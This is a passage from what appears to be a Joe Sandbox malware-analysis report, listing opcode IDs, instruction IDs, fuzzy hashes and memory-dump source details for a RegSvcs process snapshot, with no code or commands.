                                            • Snapshot File: hcaresult_19_2_1210000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ed048bdc5abf2d168020410bc06e6b8eae0d0f4d988d28a8d4ab904ed3e1e9b
                                            • Instruction ID: d7338f12ee004cca0ae1d06ae885ecc6f844b7149adf17b4c57c45edb7e33368
                                            • Opcode Fuzzy Hash: 9ed048bdc5abf2d168020410bc06e6b8eae0d0f4d988d28a8d4ab904ed3e1e9b
                                            • Instruction Fuzzy Hash: 1E21C671B103059FCB48EBBD485836FBADEEFD9210B148839D05AD7354DE348C0647A1
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2548043576.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_1210000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55d9aed467e4b5db0b4caf0082336b836d71a289e8b1a2ee27c5d36e2c5d64a5
                                            • Instruction ID: 7d70fb09593347cba0a7a0bc60bf054504c4dffbd61e70f2f81b8b2fc713574b
                                            • Opcode Fuzzy Hash: 55d9aed467e4b5db0b4caf0082336b836d71a289e8b1a2ee27c5d36e2c5d64a5
                                            • Instruction Fuzzy Hash: 82216074A00309DFCB05EFB8DA44AADBBB6FF84308F104969D015A7758EF71AA85CB51
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2548043576.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_1210000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ea1f865eaa2bf7fdd0474fa2f76034d80af27d873b399dbe04d4420e0d229bf
                                            • Instruction ID: 89dbc69197c19d53e9981601bd86dbc2cb160da7b81244fcfd43ca432d0e004b
                                            • Opcode Fuzzy Hash: 4ea1f865eaa2bf7fdd0474fa2f76034d80af27d873b399dbe04d4420e0d229bf
                                            • Instruction Fuzzy Hash: C9115A32700B015FCB28EF79845406E7AE6BE982243104E3DE02A9B7A8DF65D8498B85